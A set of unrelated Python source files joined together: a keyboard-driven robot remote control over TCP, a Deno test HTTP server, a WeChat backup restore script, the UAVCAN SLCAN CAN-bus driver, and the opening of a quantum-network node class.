# s.send(senddata.encode())
# #recvdata=s.recv(buffsize).decode('utf-8')
# #print(recvdata),。。。,,。。,,。。aqsqdqaq,,,,............jjjjlllllljjjjjjjjjjjjjllllllllllllllllllkkkkkkkkuuuuuuuuuukkkjjjjjjhhiiihihihihhiihihiihihihih...,,,,,,,,,,,,,ljljljljljljljljlqdqaqdqwqdqwqsqdqdqaqaqaqdq.,.,,..........iiiiuuuujjjljljjjjllllllllllllhhhhhhhhhhhh,,,,,mmmmm,,,........yyuuuuuuuuuuuuukkkkkkkkkllkjjjjjjjjjzxx
#s.close()
"""此模块用来做上位机,把电脑当作遥控器来对机器人进行控制
"""
keyboard = pynput.keyboard.Controller()
#TCP = Tcp_server()
#Clientsock, Clientaddress = TCP.wait_connect()
#thread = threading.Thread(target=TCP.reve_massage,
# args=(Clientsock, Clientaddress)) # t为新创建的线程
#thread.start()
"""把获取的键盘值显示出来"""
def on_press(key):
try:
print("key {} pressed".format(key.char))#输入类似abcd的值可以直接传换成字符串打印出来
if key.char is 's':
print("向后")
senddata = '2'
s.send(senddata.encode())
#contro_main.Driver_Set_Engine('a4a4')
#TCP.send_massage("a4a4", Clientsock, Clientaddress)
elif key.char is 'w':
print("向前")
senddata = '1'
s.send(senddata.encode())
#contro_main.Driver_Set_Engine('g8g8')
#TCP.send_massage("g8g8", Clientsock, Clientaddress)
elif key.char is 'd':
print("向左")
senddata = '4'
s.send(senddata.encode())
#contro_main.Driver_Set_Engine('g7a4')
#TCP.send_massage("g7a4", Clientsock, Clientaddress)
elif key.char is 'a':
print("向右")
senddata = '3'
s.send(senddata.encode())
#contro_main.Driver_Set_Engine('a4g7')
#TCP.send_massage("a4g7", Clientsock, Clientaddress)
elif key.char is 'q':
print("撒车")
senddata = '5'
s.send(senddata.encode())
elif key.char is 'i':
print("左转头")
senddata = '7'
s.send(senddata.encode())
elif key.char is 'k':
print("右转头")
senddata = '6'
s.send(senddata.encode())
elif key.char is 'h':
print("左转头")
senddata = '9'
s.send(senddata.encode())
elif key.char is 'u':
print("右转头")
senddata = '8'
s.send(senddata.encode())
elif key.char is 'j':
print("左转头")
senddata = 'a'
s.send(senddata.encode())
elif key.char is 'l':
print("右转头")
senddata = 'b'
s.send(senddata.encode())
elif key.char is ',':
print("左转头")
senddata = 'c'
s.send(senddata.encode())
elif key.char is '.':
print("右转头")
senddata = 'd'
s.send(senddata.encode())
elif key.char is 'z':
print("测距")
senddata = 'e'
s.send(senddata.encode())
elif key.char is 'x':
print("测距")
senddata = 'f'
s.send(senddata.encode())
except AttributeError:
print("special key {} pressed".format(key))#打印出来类似空格shift这样的功能按键
"""键盘抬起检测"""
def on_release(key):
try:
print("{} released".format(key))
#TCP.send_massage("a0a0", Clientsock, Clientaddress)
except AttributeError:
print("special key {} pressed".format(key))#打印出来类似空格shift这样的功能按键
# 键盘添加监听器
with pynput.keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
|
http_server.py
|
#!/usr/bin/env python
# Copyright 2018-2020 the Deno authors. All rights reserved. MIT license.
# Many tests expect there to be an http server on port 4545 servering the deno
# root directory.
from collections import namedtuple
from contextlib import contextmanager
import os
import SimpleHTTPServer
import SocketServer
import socket
import sys
from time import sleep
from threading import Thread
from util import root_path
PORT = 4545
REDIRECT_PORT = 4546
ANOTHER_REDIRECT_PORT = 4547
DOUBLE_REDIRECTS_PORT = 4548
INF_REDIRECTS_PORT = 4549
QUIET = '-v' not in sys.argv and '--verbose' not in sys.argv
class QuietSimpleHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def log_request(self, code='-', size='-'):
if not QUIET:
SimpleHTTPServer.SimpleHTTPRequestHandler.log_request(
self, code, size)
class ContentTypeHandler(QuietSimpleHTTPRequestHandler):
def do_GET(self):
if "multipart_form_data.txt" in self.path:
self.protocol_version = 'HTTP/1.1'
self.send_response(200, 'OK')
self.send_header('Content-type',
'multipart/form-data;boundary=boundary')
self.end_headers()
self.wfile.write(
bytes('Preamble\r\n'
'--boundary\t \r\n'
'Content-Disposition: form-data; name="field_1"\r\n'
'\r\n'
'value_1 \r\n'
'\r\n--boundary\r\n'
'Content-Disposition: form-data; name="field_2"; '
'filename="file.js"\r\n'
'Content-Type: text/javascript\r\n'
'\r\n'
'console.log("Hi")'
'\r\n--boundary--\r\n'
'Epilogue'))
return
return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
def do_POST(self):
# Simple echo server for request reflection
if "echo_server" in self.path:
self.protocol_version = 'HTTP/1.1'
self.send_response(200, 'OK')
if self.headers.has_key('content-type'):
self.send_header('content-type',
self.headers.getheader('content-type'))
if self.headers.has_key('user-agent'):
self.send_header('user-agent',
self.headers.getheader('user-agent'))
self.end_headers()
data_string = self.rfile.read(int(self.headers['Content-Length']))
self.wfile.write(bytes(data_string))
return
self.protocol_version = 'HTTP/1.1'
self.send_response(501)
self.send_header('content-type', 'text/plain')
self.end_headers()
self.wfile.write(bytes('Server does not support this operation'))
def guess_type(self, path):
if ".t1." in path:
return "text/typescript"
if ".t2." in path:
return "video/vnd.dlna.mpeg-tts"
if ".t3." in path:
return "video/mp2t"
if ".t4." in path:
return "application/x-typescript"
if ".j1." in path:
return "text/javascript"
if ".j2." in path:
return "application/ecmascript"
if ".j3." in path:
return "text/ecmascript"
if ".j4." in path:
return "application/x-javascript"
if "form_urlencoded" in path:
return "application/x-www-form-urlencoded"
if "no_ext" in path:
return "text/typescript"
if "unknown_ext" in path:
return "text/typescript"
if "mismatch_ext" in path:
return "text/javascript"
return SimpleHTTPServer.SimpleHTTPRequestHandler.guess_type(self, path)
RunningServer = namedtuple("RunningServer", ["server", "thread"])
def get_socket(port, handler):
SocketServer.TCPServer.allow_reuse_address = True
if os.name != "nt":
# We use AF_INET6 to avoid flaky test issue, particularly with
# the test 019_media_types. It's not well understood why this fixes the
# flaky tests, but it does appear to...
# See https://github.com/denoland/deno/issues/3332
SocketServer.TCPServer.address_family = socket.AF_INET6
return SocketServer.TCPServer(("", port), handler)
def server():
os.chdir(root_path) # Hopefully the main thread doesn't also chdir.
Handler = ContentTypeHandler
Handler.extensions_map.update({
".ts": "application/typescript",
".js": "application/javascript",
".tsx": "application/typescript",
".jsx": "application/javascript",
".json": "application/json",
})
s = get_socket(PORT, Handler)
if not QUIET:
print "Deno test server http://localhost:%d/" % PORT
return RunningServer(s, start(s))
def base_redirect_server(host_port, target_port, extra_path_segment=""):
os.chdir(root_path)
target_host = "http://localhost:%d" % target_port
class RedirectHandler(QuietSimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(301)
self.send_header('Location',
target_host + extra_path_segment + self.path)
self.end_headers()
s = get_socket(host_port, RedirectHandler)
if not QUIET:
print "redirect server http://localhost:%d/ -> http://localhost:%d/" % (
host_port, target_port)
return RunningServer(s, start(s))
# redirect server
def redirect_server():
return base_redirect_server(REDIRECT_PORT, PORT)
# another redirect server pointing to the same port as the one above
# BUT with an extra subdir path
def another_redirect_server():
return base_redirect_server(
ANOTHER_REDIRECT_PORT, PORT, extra_path_segment="/tests/subdir")
# redirect server that points to another redirect server
def double_redirects_server():
return base_redirect_server(DOUBLE_REDIRECTS_PORT, REDIRECT_PORT)
# redirect server that points to itself
def inf_redirects_server():
return base_redirect_server(INF_REDIRECTS_PORT, INF_REDIRECTS_PORT)
def start(s):
thread = Thread(target=s.serve_forever, kwargs={"poll_interval": 0.05})
thread.daemon = True
thread.start()
return thread
@contextmanager
def spawn():
servers = (server(), redirect_server(), another_redirect_server(),
double_redirects_server())
while any(not s.thread.is_alive() for s in servers):
sleep(0.01)
try:
print "ready"
yield servers
finally:
for s in servers:
s.server.shutdown()
def main():
with spawn() as servers:
try:
while all(s.thread.is_alive() for s in servers):
sleep(1)
except KeyboardInterrupt:
pass
sys.exit(1)
if __name__ == '__main__':
main()
|
restore_wechat_backup.py
|
#!/usr/bin/python -u
"""
Copyright 2017, Jacksgong(https://blog.dreamtobe.cn)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Script to restore wechat backup on mac.
from os.path import exists
from shutil import copytree
from threading import Thread
from wechat_backup_utils import select_conf_file, colorize, RED, GREEN, show_spinner
src, dst, conf_path = select_conf_file()
if src is None or dst is None:
exit(colorize("we can't find source directory or target directory on " + conf_path, fg=RED))
if exists(src):
exit(colorize(
"the src directory['" + src + "']is exist, if you want to restore, please remove the src directory first",
fg=RED))
if not exists(dst):
exit(colorize("we can't find backup files on " + dst, fg=RED))
print colorize("start restore " + dst + " to " + src, fg=GREEN)
thread = Thread(target=copytree, args=[dst, src])
thread.start()
show_spinner(thread)
print 'everything is done!'
|
slcan.py
|
#
# Copyright (C) 2014-2016 UAVCAN Development Team <uavcan.org>
#
# This software is distributed under the terms of the MIT License.
#
# Author: Ben Dyer <ben_dyer@mac.com>
# Pavel Kirienko <pavel.kirienko@zubax.com>
#
from __future__ import division, absolute_import, print_function, unicode_literals
import os
import sys
import time
import inspect
import binascii
import select
import multiprocessing
import threading
import copy
from logging import getLogger
from .common import DriverError, TxQueueFullError, CANFrame, AbstractDriver
from .timestamp_estimator import TimestampEstimator
try:
import queue
except ImportError:
# noinspection PyPep8Naming,PyUnresolvedReferences
import Queue as queue
logger = getLogger(__name__)
# If PySerial isn't available, we can't support SLCAN
try:
import serial
except ImportError:
serial = None
logger.info("Cannot import PySerial; SLCAN will not be available.")
try:
# noinspection PyUnresolvedReferences
sys.getwindowsversion()
RUNNING_ON_WINDOWS = True
except AttributeError:
RUNNING_ON_WINDOWS = False
#
# Constants and defaults
#
if 'darwin' in sys.platform:
RX_QUEUE_SIZE = 32767 # http://stackoverflow.com/questions/5900985/multiprocessing-queue-maxsize-limit-is-32767
else:
RX_QUEUE_SIZE = 1000000
TX_QUEUE_SIZE = 1000
TIMESTAMP_OVERFLOW_PERIOD = 60 # Defined by SLCAN protocol
DEFAULT_BITRATE = 1000000
DEFAULT_BAUDRATE = 3000000
ACK_TIMEOUT = 0.5
ACK = b'\r'
NACK = b'\x07'
CLI_END_OF_LINE = b'\r\n'
CLI_END_OF_TEXT = b'\x03'
DEFAULT_MAX_ADAPTER_CLOCK_RATE_ERROR_PPM = 200 # Suits virtually all adapters
DEFAULT_FIXED_RX_DELAY = 0.0002 # Good for USB, could be higher for UART
DEFAULT_MAX_ESTIMATED_RX_DELAY_TO_RESYNC = 0.1 # When clock divergence exceeds this value, resync
IO_PROCESS_INIT_TIMEOUT = 10
IO_PROCESS_NICENESS_INCREMENT = -18
MAX_SUCCESSIVE_ERRORS_TO_GIVE_UP = 1000
#
# IPC entities
#
IPC_SIGNAL_INIT_OK = 'init_ok' # Sent from IO process to the parent process when init is done
IPC_COMMAND_STOP = 'stop' # Sent from parent process to the IO process when it's time to exit
class IPCCommandLineExecutionRequest:
DEFAULT_TIMEOUT = 1
def __init__(self, command, timeout=None):
if isinstance(command, bytes):
command = command.decode('utf8')
self.command = command.lstrip()
self.monotonic_deadline = time.monotonic() + (timeout or self.DEFAULT_TIMEOUT)
@property
def expired(self):
return time.monotonic() >= self.monotonic_deadline
class IPCCommandLineExecutionResponse:
def __init__(self, command, lines=None, expired=False):
def try_decode(what):
if isinstance(what, bytes):
return what.decode('utf8')
return what
self.command = try_decode(command)
self.lines = [try_decode(ln) for ln in (lines or [])]
self.expired = expired
def __str__(self):
if not self.expired:
return '%r %r' % (self.command, self.lines)
else:
return '%r EXPIRED' % self.command
__repr__ = __str__
_pending_command_line_execution_requests = queue.Queue()
#
# Logic of the IO process
#
class RxWorker:
PY2_COMPAT = sys.version_info[0] < 3
SELECT_TIMEOUT = 0.1
READ_BUFFER_SIZE = 1024 * 8 # Arbitrary large number
def __init__(self, conn, rx_queue, ts_estimator_mono, ts_estimator_real, termination_condition):
self._conn = conn
self._output_queue = rx_queue
self._ts_estimator_mono = ts_estimator_mono
self._ts_estimator_real = ts_estimator_real
self._termination_condition = termination_condition
if RUNNING_ON_WINDOWS:
# select() doesn't work on serial ports under Windows, so we have to resort to workarounds. :(
self._conn.timeout = self.SELECT_TIMEOUT
else:
self._conn.timeout = 0
def _read_port(self):
if RUNNING_ON_WINDOWS:
data = self._conn.read(max(1, self._conn.inWaiting()))
# Timestamping as soon as possible after unblocking
ts_mono = time.monotonic()
ts_real = time.time()
else:
select.select([self._conn.fileno()], [], [], self.SELECT_TIMEOUT)
# Timestamping as soon as possible after unblocking
ts_mono = time.monotonic()
ts_real = time.time()
# Read as much data as possible in order to avoid RX overrun
data = self._conn.read(self.READ_BUFFER_SIZE)
return data, ts_mono, ts_real
def _process_slcan_line(self, line, local_ts_mono, local_ts_real):
line = line.strip().strip(NACK).strip(CLI_END_OF_TEXT)
line_len = len(line)
if line_len < 1:
return
# Checking the header, ignore all irrelevant lines
if line[0] == b'T'[0]:
id_len = 8
elif line[0] == b't'[0]:
id_len = 3
else:
return
# Parsing ID and DLC
packet_id = int(line[1:1 + id_len], 16)
if self.PY2_COMPAT:
packet_len = int(line[1 + id_len]) # This version is horribly slow
else:
packet_len = line[1 + id_len] - 48 # Py3 version is faster
if packet_len > 8 or packet_len < 0:
raise DriverError('Invalid packet length')
# Parsing the payload, detecting timestamp
# <type> <id> <dlc> <data> [timestamp]
# 1 3|8 1 packet_len * 2 [4]
with_timestamp = line_len > (2 + id_len + packet_len * 2)
packet_data = binascii.a2b_hex(line[2 + id_len:2 + id_len + packet_len * 2])
# Handling the timestamp, if present
if with_timestamp:
ts_hardware = int(line[-4:], 16) * 1e-3
ts_mono = self._ts_estimator_mono.update(ts_hardware, local_ts_mono)
ts_real = self._ts_estimator_real.update(ts_hardware, local_ts_real)
else:
ts_mono = local_ts_mono
ts_real = local_ts_real
frame = CANFrame(packet_id, packet_data, (id_len == 8), ts_monotonic=ts_mono, ts_real=ts_real)
self._output_queue.put_nowait(frame)
def _process_many_slcan_lines(self, lines, ts_mono, ts_real):
for slc in lines:
# noinspection PyBroadException
try:
self._process_slcan_line(slc, local_ts_mono=ts_mono, local_ts_real=ts_real)
except Exception:
logger.error('Could not process SLCAN line %r', slc, exc_info=True)
# noinspection PyBroadException
def run(self):
logger.info('RX worker started')
successive_errors = 0
data = bytes()
outstanding_command = None
outstanding_command_response_lines = []
while not self._termination_condition():
try:
new_data, ts_mono, ts_real = self._read_port()
data += new_data
# Checking the command queue and handling command timeouts
while True:
if outstanding_command is None:
try:
outstanding_command = _pending_command_line_execution_requests.get_nowait()
outstanding_command_response_lines = []
except queue.Empty:
break
if outstanding_command.expired:
self._output_queue.put(IPCCommandLineExecutionResponse(outstanding_command.command,
expired=True))
outstanding_command = None
else:
break
# Processing in normal mode if there's no outstanding command; using much slower CLI mode otherwise
if outstanding_command is None:
slcan_lines = data.split(ACK)
slcan_lines, data = slcan_lines[:-1], slcan_lines[-1]
self._process_many_slcan_lines(slcan_lines, ts_mono=ts_mono, ts_real=ts_real)
del slcan_lines
else:
# TODO This branch contains dirty and poorly tested code. Refactor once the protocol matures.
split_lines = data.split(CLI_END_OF_LINE)
split_lines, data = split_lines[:-1], split_lines[-1]
# Processing the mix of SLCAN and CLI lines
for ln in split_lines:
tmp = ln.split(ACK)
slcan_lines, cli_line = tmp[:-1], tmp[-1]
self._process_many_slcan_lines(slcan_lines, ts_mono=ts_mono, ts_real=ts_real)
# Processing the CLI line
logger.debug('Processing CLI response line %r as...', cli_line)
if len(outstanding_command_response_lines) == 0:
if outstanding_command is not None and \
cli_line == outstanding_command.command.encode('utf8'):
logger.debug('...echo')
outstanding_command_response_lines.append(cli_line)
else:
# Otherwise we're receiving some CLI garbage before or after the command output, e.g.
# end of the previous command output if it was missed
logger.debug('...garbage')
else:
if cli_line == CLI_END_OF_TEXT:
logger.debug('...end-of-text')
# Shipping
response = IPCCommandLineExecutionResponse(outstanding_command.command,
lines=outstanding_command_response_lines[1:])
self._output_queue.put(response)
# Immediately fetching the next command, expiration is not checked
try:
outstanding_command = _pending_command_line_execution_requests.get_nowait()
except queue.Empty:
outstanding_command = None
outstanding_command_response_lines = []
else:
logger.debug('...mid response')
outstanding_command_response_lines.append(cli_line)
del split_lines
# The remainder may contain SLCAN and CLI lines as well;
# there is no reason not to process SLCAN ones immediately.
# The last byte could be beginning of an \r\n sequence, so it's excluded from parsing.
data, last_byte = data[:-1], data[-1:]
slcan_lines = data.split(ACK)
slcan_lines, data = slcan_lines[:-1], slcan_lines[-1] + last_byte
self._process_many_slcan_lines(slcan_lines, ts_mono=ts_mono, ts_real=ts_real)
successive_errors = 0
except Exception as ex:
# TODO: handle the case when the port is closed
logger.error('RX thread error %d of %d',
successive_errors, MAX_SUCCESSIVE_ERRORS_TO_GIVE_UP, exc_info=True)
try:
self._output_queue.put_nowait(ex)
except Exception:
pass
successive_errors += 1
if successive_errors >= MAX_SUCCESSIVE_ERRORS_TO_GIVE_UP:
break
logger.info('RX worker is stopping')
class TxWorker:
QUEUE_BLOCK_TIMEOUT = 0.1
def __init__(self, conn, rx_queue, tx_queue, termination_condition):
self._conn = conn
self._rx_queue = rx_queue
self._tx_queue = tx_queue
self._termination_condition = termination_condition
def _send_frame(self, frame):
line = '%s%d%s\r' % (('T%08X' if frame.extended else 't%03X') % frame.id,
len(frame.data),
binascii.b2a_hex(frame.data).decode('ascii'))
self._conn.write(line.encode('ascii'))
self._conn.flush()
def _execute_command(self, command):
logger.info('Executing command line %r', command.command)
# It is extremely important to write into the queue first, in order to make the RX worker expect the response!
_pending_command_line_execution_requests.put(command)
self._conn.write(command.command.encode('ascii') + CLI_END_OF_LINE)
self._conn.flush()
def run(self):
while True:
try:
command = self._tx_queue.get(True, self.QUEUE_BLOCK_TIMEOUT)
if isinstance(command, CANFrame):
self._send_frame(command)
elif isinstance(command, IPCCommandLineExecutionRequest):
self._execute_command(command)
elif command == IPC_COMMAND_STOP:
break
else:
raise DriverError('IO process received unknown IPC command: %r' % command)
except queue.Empty:
# Checking in this handler in order to avoid interference with traffic
if self._termination_condition():
break
except Exception as ex:
logger.error('TX thread exception', exc_info=True)
# Propagating the exception to the parent process
# noinspection PyBroadException
try:
self._rx_queue.put_nowait(ex)
except Exception:
pass
# noinspection PyUnresolvedReferences
def _raise_self_process_priority():
if RUNNING_ON_WINDOWS:
import win32api
import win32process
import win32con
handle = win32api.OpenProcess(win32con.PROCESS_ALL_ACCESS, True, win32api.GetCurrentProcessId())
win32process.SetPriorityClass(handle, win32process.REALTIME_PRIORITY_CLASS)
else:
import os
os.nice(IO_PROCESS_NICENESS_INCREMENT)
def _init_adapter(conn, bitrate):
def wait_for_ack():
logger.info('Init: Waiting for ACK...')
conn.timeout = ACK_TIMEOUT
while True:
b = conn.read(1)
if not b:
raise DriverError('SLCAN ACK timeout')
if b == NACK:
raise DriverError('SLCAN NACK in response')
if b == ACK:
break
logger.info('Init: Ignoring byte %r while waiting for ACK', b)
def send_command(cmd):
logger.info('Init: Sending command %r', cmd)
conn.write(cmd + b'\r')
speed_code = {
1000000: 8,
800000: 7,
500000: 6,
250000: 5,
125000: 4,
100000: 3,
50000: 2,
20000: 1,
10000: 0
}[bitrate if bitrate is not None else DEFAULT_BITRATE]
num_retries = 3
while True:
try:
# Sending an empty command in order to reset the adapter's command parser, then discarding all output
send_command(b'')
try:
wait_for_ack()
except DriverError:
pass
time.sleep(0.1)
conn.flushInput()
# Making sure the channel is closed - some adapters may refuse to re-open if the channel is already open
send_command(b'C')
try:
wait_for_ack()
except DriverError:
pass
# Setting speed code
send_command(('S%d' % speed_code).encode())
conn.flush()
wait_for_ack()
# Opening the channel
send_command(b'O')
conn.flush()
wait_for_ack()
# Clearing error flags
send_command(b'F')
conn.flush()
try:
wait_for_ack()
except DriverError as ex:
logger.warning('Init: Could not clear error flags (command not supported by the CAN adapter?): %s', ex)
except Exception as ex:
if num_retries > 0:
logger.error('Could not init SLCAN adapter, will retry; error was: %s', ex, exc_info=True)
else:
raise ex
num_retries -= 1
else:
break
# Discarding all input again
time.sleep(0.1)
conn.flushInput()
def _stop_adapter(conn):
conn.write(b'C\r' * 10)
conn.flush()
# noinspection PyBroadException
def _io_process(device,
tx_queue,
rx_queue,
log_queue,
parent_pid,
bitrate=None,
baudrate=None,
max_adapter_clock_rate_error_ppm=None,
fixed_rx_delay=None,
max_estimated_rx_delay_to_resync=None):
try:
# noinspection PyUnresolvedReferences
from logging.handlers import QueueHandler
except ImportError:
pass # Python 2.7, no logging for you
else:
getLogger().addHandler(QueueHandler(log_queue))
getLogger().setLevel('INFO')
logger.info('IO process started with PID %r', os.getpid())
# We don't need stdin
try:
stdin_fileno = sys.stdin.fileno()
sys.stdin.close()
os.close(stdin_fileno)
except Exception:
pass
def is_parent_process_alive():
if RUNNING_ON_WINDOWS:
return True # TODO: Find a working solution for Windows (os.kill(ppid, 0) doesn't work)
else:
return os.getppid() == parent_pid
try:
_raise_self_process_priority()
except Exception as ex:
logger.warning('Could not adjust priority of the IO process: %r', ex)
#
# This is needed to convert timestamps from hardware clock to local clocks
#
if max_adapter_clock_rate_error_ppm is None:
max_adapter_clock_rate_error = DEFAULT_MAX_ADAPTER_CLOCK_RATE_ERROR_PPM / 1e6
else:
max_adapter_clock_rate_error = max_adapter_clock_rate_error_ppm / 1e6
fixed_rx_delay = fixed_rx_delay if fixed_rx_delay is not None else DEFAULT_FIXED_RX_DELAY
max_estimated_rx_delay_to_resync = max_estimated_rx_delay_to_resync or DEFAULT_MAX_ESTIMATED_RX_DELAY_TO_RESYNC
ts_estimator_mono = TimestampEstimator(max_rate_error=max_adapter_clock_rate_error,
source_clock_overflow_period=TIMESTAMP_OVERFLOW_PERIOD,
fixed_delay=fixed_rx_delay,
max_phase_error_to_resync=max_estimated_rx_delay_to_resync)
ts_estimator_real = copy.deepcopy(ts_estimator_mono)
#
# Preparing the RX thread
#
should_exit = False
def rx_thread_wrapper():
rx_worker = RxWorker(conn=conn,
rx_queue=rx_queue,
ts_estimator_mono=ts_estimator_mono,
ts_estimator_real=ts_estimator_real,
termination_condition=lambda: should_exit)
try:
rx_worker.run()
except Exception as ex:
logger.error('RX thread failed, exiting', exc_info=True)
# Propagating the exception to the parent process
rx_queue.put(ex)
rxthd = threading.Thread(target=rx_thread_wrapper, name='slcan_rx')
rxthd.daemon = True
try:
conn = serial.Serial(device, baudrate or DEFAULT_BAUDRATE)
except Exception as ex:
logger.error('Could not open port', exc_info=True)
rx_queue.put(ex)
return
#
# Actual work is here
#
try:
_init_adapter(conn, bitrate)
rxthd.start()
logger.info('IO process initialization complete')
rx_queue.put(IPC_SIGNAL_INIT_OK)
tx_worker = TxWorker(conn=conn,
rx_queue=rx_queue,
tx_queue=tx_queue,
termination_condition=lambda: (should_exit or
not rxthd.is_alive() or
not is_parent_process_alive()))
tx_worker.run()
except Exception as ex:
logger.error('IO process failed', exc_info=True)
rx_queue.put(ex)
finally:
logger.info('IO process is terminating...')
should_exit = True
if rxthd.is_alive():
rxthd.join()
_stop_adapter(conn)
conn.close()
logger.info('IO process is now ready to die, goodbye')
#
# Logic of the main process
#
class SLCAN(AbstractDriver):
"""
Driver for SLCAN-compatible CAN bus adapters, with extension to support CLI commands.
Some info on SLCAN can be found here:
- Linux tree: drivers/net/can/slcan.c (http://lxr.free-electrons.com/source/drivers/net/can/slcan.c)
- https://files.zubax.com/docs/Generic_SLCAN_API.pdf
- http://www.can232.com/docs/canusb_manual.pdf
- http://www.fischl.de/usbtin/
The CLI extension allows to execute arbitrary CLI commands on the adapter. The commands differ from regular SLCAN
exchange in the following ways:
- CLI commands are echoed back.
- Every output line of a CLI command, including echo, is terminated with CR LF (\r\n).
- After the last line follows the ASCII End Of Text character (ETX, ^C, ASCII code 0x03) on a separate
line (terminated with CR LF).
- CLI commands must not begin with whitespace characters.
Example:
Input command "stat\r\n" may produce the following output lines:
- Echo: "stat\r\n"
- Data: "First line\r\n", "Second line\r\n", ...
- End Of Text marker: "\x03\r\n"
Refer to https://kb.zubax.com for more info.
"""
def __init__(self, device_name, **kwargs):
if not serial:
raise RuntimeError("PySerial not imported; SLCAN is not available. Please install PySerial.")
super(SLCAN, self).__init__()
self._stopping = False
self._rx_queue = multiprocessing.Queue(maxsize=RX_QUEUE_SIZE)
self._tx_queue = multiprocessing.Queue(maxsize=TX_QUEUE_SIZE)
self._log_queue = multiprocessing.Queue()
self._cli_command_requests = [] # List of tuples: (command, callback)
# https://docs.python.org/3/howto/logging-cookbook.html
self._logging_thread = threading.Thread(target=self._logging_proxy_loop, name='slcan_log_proxy')
self._logging_thread.daemon = True
# Removing all unused stuff, because it breaks inter process communications.
kwargs = copy.copy(kwargs)
keep_keys = inspect.getargspec(_io_process).args
for key in list(kwargs.keys()):
if key not in keep_keys:
del kwargs[key]
kwargs['rx_queue'] = self._rx_queue
kwargs['tx_queue'] = self._tx_queue
kwargs['log_queue'] = self._log_queue
kwargs['parent_pid'] = os.getpid()
self._proc = multiprocessing.Process(target=_io_process, name='slcan_io_process',
args=(device_name,), kwargs=kwargs)
self._proc.daemon = True
self._proc.start()
# The logging thread should be started immediately AFTER the IO process is started
self._logging_thread.start()
deadline = time.monotonic() + IO_PROCESS_INIT_TIMEOUT
while True:
try:
sig = self._rx_queue.get(timeout=IO_PROCESS_INIT_TIMEOUT)
if sig == IPC_SIGNAL_INIT_OK:
break
if isinstance(sig, Exception):
self._tx_queue.put(IPC_COMMAND_STOP, timeout=IO_PROCESS_INIT_TIMEOUT)
raise sig
except queue.Empty:
pass
if time.monotonic() > deadline:
self._tx_queue.put(IPC_COMMAND_STOP, timeout=IO_PROCESS_INIT_TIMEOUT)
raise DriverError('IO process did not confirm initialization')
self._check_alive()
# noinspection PyBroadException
def _logging_proxy_loop(self):
while self._proc.is_alive() and not self._stopping:
try:
try:
record = self._log_queue.get(timeout=0.5)
except queue.Empty:
continue
getLogger(record.name).handle(record)
except Exception as ex:
try:
print('SLCAN logging proxy failed:', ex, file=sys.stderr)
except Exception:
pass
logger.info('Logging proxy thread is stopping')
def close(self):
if self._proc.is_alive():
self._tx_queue.put(IPC_COMMAND_STOP)
self._proc.join(10)
# Sometimes the child process stucks at exit, this is a workaround
if self._proc.is_alive() or self._proc.exitcode is None:
logger.warning('IO process refused to exit and will be terminated')
try:
self._proc.terminate()
except Exception as ex:
logger.error('Failed to terminate the IO process [%r]', ex, exc_info=True)
try:
if self._proc.is_alive():
logger.error('IO process refused to terminate, escalating to SIGKILL')
import signal
os.kill(self._proc.pid, signal.SIGKILL)
except Exception as ex:
logger.critical('Failed to kill the IO process [%r]', ex, exc_info=True)
self._stopping = True
self._logging_thread.join()
def __del__(self):
self.close()
def _check_alive(self):
if not self._proc.is_alive():
raise DriverError('IO process is dead :(')
def receive(self, timeout=None):
self._check_alive()
if timeout is None:
deadline = None
elif timeout == 0:
deadline = 0
else:
deadline = time.monotonic() + timeout
while True:
# Blockingly reading the queue
try:
if deadline is None:
get_timeout = None
elif deadline == 0:
# TODO this is a workaround. Zero timeout causes the IPC queue to ALWAYS throw queue.Empty!
get_timeout = 1e-3
else:
# TODO this is a workaround. Zero timeout causes the IPC queue to ALWAYS throw queue.Empty!
get_timeout = max(1e-3, deadline - time.monotonic())
obj = self._rx_queue.get(timeout=get_timeout)
except queue.Empty:
return
# Handling the received thing
if isinstance(obj, CANFrame):
self._rx_hook(obj)
return obj
elif isinstance(obj, Exception): # Propagating exceptions from the IO process to the main process
raise obj
elif isinstance(obj, IPCCommandLineExecutionResponse):
while len(self._cli_command_requests):
(stored_command, stored_callback), self._cli_command_requests = \
self._cli_command_requests[0], self._cli_command_requests[1:]
if stored_command == obj.command:
stored_callback(obj)
break
else:
logger.error('Mismatched CLI response: expected %r, got %r', stored_command, obj.command)
else:
raise DriverError('Unexpected entity in IPC channel: %r' % obj)
# Termination condition
if deadline == 0:
break
elif deadline is not None:
if time.monotonic() >= deadline:
return
def send(self, message_id, message, extended=False):
self._check_alive()
frame = CANFrame(message_id, message, extended)
try:
self._tx_queue.put_nowait(frame)
except queue.Full:
raise TxQueueFullError()
self._tx_hook(frame)
def execute_cli_command(self, command, callback, timeout=None):
"""
Executes an arbitrary CLI command on the SLCAN adapter, assuming that the adapter supports CLI commands.
The callback will be invoked from the method receive() using same thread.
If the command times out, the callback will be invoked anyway, with 'expired' flag set.
Args:
command: Command as unicode string or bytes
callback: A callable that accepts one argument.
The argument is an instance of IPCCommandLineExecutionResponse
timeout: Timeout in seconds. None to use default timeout.
"""
self._check_alive()
request = IPCCommandLineExecutionRequest(command, timeout)
try:
self._tx_queue.put(request, timeout=timeout)
except queue.Full:
raise TxQueueFullError()
# The command could be modified by the IPCCommandLineExecutionRequest
self._cli_command_requests.append((request.command, callback))
|
qgmnode.py
|
from bitarray import bitarray
from random import *
from time import sleep
from threading import Thread
import sys
from cqc.pythonLib import *
from protocol import *
from utils import *
##############################
#
# QGMNode class derived from CQCConnection, with reg* attributes
#
class QGMNode():
def __init__(self, myid, d, p, n):
self.myid = myid
self.myself = 'node'+str(myid)
self.d = d
self.p = p
self.n = n
self.indexes = {}
# Number of child nodes that responded to having finished STEP1
self.numChildAnsw = 0
# Flag to establish when STEP1 has been terminated with all the nodes involved
self.step1Terminated = 0
# Flag to determine when to execute STEP1 as a parent node
self.startStep1AsParent = 0
# Flag to determine when the parent node can start STEP1 with the right child node
self.step1rightChild = 0
# Flag to determine if a local violation can be notified
self.notifyFlag = 1
# Flag to determine if there are pending local violations that have yet to be resolved
self.pendingViolation = 0
# Bit registers for local state and global state
self.regVLocal = bitarray(d)
